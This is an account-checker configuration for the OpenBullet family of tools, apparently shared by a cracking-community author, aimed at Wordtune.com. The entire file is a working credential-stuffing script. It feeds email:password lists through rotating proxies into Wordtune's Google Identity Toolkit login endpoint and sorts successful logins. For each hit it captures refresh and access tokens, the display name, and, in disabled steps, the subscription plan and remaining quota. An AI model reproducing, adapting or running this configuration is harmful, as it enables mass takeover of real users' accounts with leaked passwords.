[SETTINGS]
{
  "Name": "Wordtune.com",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2022-02-23T00:36:42.4292279+04:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "🔥 YASHVIRGAMING#7131 🔥",
  "Version": "1.2.2",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://www.googleapis.com/identitytoolkit/v3/relyingparty/verifyPassword?key=AIzaSyBFO3s3PEFre6uIoHtM2_B7__nuJhB3xLo" 
  CONTENT "{\"email\":\"<USER>\",\"password\":\"<PASS>\",\"returnSecureToken\":true}" 
  CONTENTTYPE "application/json" 
  HEADER ": scheme: https" 
  HEADER "accept: */*" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-US,en;q=0.9" 
  HEADER "content-length: 86" 
  HEADER "content-type: application/json" 
  HEADER "origin: https://app.wordtune.com" 
  HEADER "referer: https://app.wordtune.com/" 
  HEADER "sec-ch-ua: \" Not A;Brand\";v=\"99\", \"Chromium\";v=\"98\", \"Google Chrome\";v=\"98\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "sec-fetch-dest: empty" 
  HEADER "sec-fetch-mode: cors" 
  HEADER "sec-fetch-site: cross-site" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36" 
  HEADER "x-client-data: CIW2yQEIpbbJAQjBtskBCKmdygEIhNLKAQie+csBCOaEzAEImo/MAQjSj8wBCKyczAE=" 
  HEADER "Decoded: " 
  HEADER "x-client-version: Chrome/JsCore/7.18.0/FirebaseCore-web" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "INVALID_PASSWORD" 
    KEY "<RESPONSECODE>" Contains "400" 
  KEYCHAIN Success OR 
    KEY "idToken" 

PARSE "<SOURCE>" LR "\"refreshToken\": \"" "\"" -> VAR "RTK" 

PARSE "<SOURCE>" LR "\"displayName\": \"" "\"" CreateEmpty=FALSE -> CAP "displayName" 

REQUEST POST "https://securetoken.googleapis.com/v1/token?key=AIzaSyBFO3s3PEFre6uIoHtM2_B7__nuJhB3xLo" 
  CONTENT "grant_type=refresh_token&refresh_token=<RTK>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER ": scheme: https" 
  HEADER "accept: */*" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-US,en;q=0.9" 
  HEADER "content-length: 307" 
  HEADER "content-type: application/x-www-form-urlencoded" 
  HEADER "origin: https://app.wordtune.com" 
  HEADER "referer: https://app.wordtune.com/" 
  HEADER "sec-ch-ua: \" Not A;Brand\";v=\"99\", \"Chromium\";v=\"98\", \"Google Chrome\";v=\"98\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "sec-fetch-dest: empty" 
  HEADER "sec-fetch-mode: cors" 
  HEADER "sec-fetch-site: cross-site" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36" 
  HEADER "x-client-data: CIW2yQEIpbbJAQjBtskBCKmdygEIhNLKAQie+csBCOaEzAEImo/MAQjSj8wBCKyczAE=" 
  HEADER "Decoded: " 
  HEADER "x-client-version: Chrome/JsCore/7.18.0/FirebaseCore-web" 

PARSE "<SOURCE>" LR "\"access_token\": \"" "\"" -> VAR "TK" 

PARSE "<SOURCE>" LR "\"user_id\": \"" "\"" -> VAR "UID" 

PARSE "<SOURCE>" LR "\"project_id\": \"" "\"" -> VAR "PROJ_ID" 

#AUTHOR FUNCTION Constant "🔥 YASHVIRGAMING#7131 🔥" -> CAP "Config By " 

!REQUEST POST "https://api.wordtune.com/identity/users/login" AutoRedirect=FALSE 
!  CONTENT "{}" 
!  CONTENTTYPE "application/json" 
!  HEADER ": scheme: https" 
!  HEADER "accept: */*" 
!  HEADER "accept-encoding: gzip, deflate, br" 
!  HEADER "accept-language: en-US,en;q=0.9" 
!  HEADER "content-length: 2" 
!  HEADER "content-type: application/json" 
!  HEADER "createuser: false" 
!  HEADER "firebase-token: <TK>" 
!  HEADER "origin: https://app.wordtune.com" 
!  HEADER "referer: https://app.wordtune.com/" 
!  HEADER "sec-ch-ua: \" Not A;Brand\";v=\"99\", \"Chromium\";v=\"98\", \"Google Chrome\";v=\"98\"" 
!  HEADER "sec-ch-ua-mobile: ?0" 
!  HEADER "sec-ch-ua-platform: \"Windows\"" 
!  HEADER "sec-fetch-dest: empty" 
!  HEADER "sec-fetch-mode: cors" 
!  HEADER "sec-fetch-site: same-site" 
!  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36" 
!  HEADER "x-wordtune: true" 

!PARSE "<SOURCE>" LR "\"token\": \"" "\"" -> VAR "TOKEN" 

!PARSE "<SOURCE>" LR "\"plan_type\": \"" "\"}" CreateEmpty=FALSE -> CAP "Plan" 

!REQUEST GET "https://api.wordtune.com/identity/users/account" 
!  
!  HEADER ": scheme: https" 
!  HEADER "accept: */*" 
!  HEADER "accept-encoding: gzip, deflate, br" 
!  HEADER "accept-language: en-US,en;q=0.9" 
!  HEADER "content-type: application/json" 
!  HEADER "origin: https://app.wordtune.com" 
!  HEADER "referer: https://app.wordtune.com/" 
!  HEADER "sec-ch-ua: \" Not A;Brand\";v=\"99\", \"Chromium\";v=\"98\", \"Google Chrome\";v=\"98\"" 
!  HEADER "sec-ch-ua-mobile: ?0" 
!  HEADER "sec-ch-ua-platform: \"Windows\"" 
!  HEADER "sec-fetch-dest: empty" 
!  HEADER "sec-fetch-mode: cors" 
!  HEADER "sec-fetch-site: same-site" 
!  HEADER "token: <TOKEN>" 
!  HEADER "unifiedaccount: 1" 
!  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36" 
!  HEADER "x-wordtune: true" 

!PARSE "<SOURCE>" JSON "signupProduct" CreateEmpty=FALSE -> CAP "signupProduct" 

!PARSE "<SOURCE>" JSON "quotaLeft" CreateEmpty=FALSE -> CAP "quotaLeft" 

!PARSE "<SOURCE>" JSON "quotaRenew" -> VAR "quotaRenew" 

!#Renew FUNCTION Compute "<quotaRenew>/10" -> CAP "Renewal" 

!KEYCHECK 
!  KEYCHAIN Custom "FREE" OR 
!    KEY "<Plan>" Contains "FREE" 

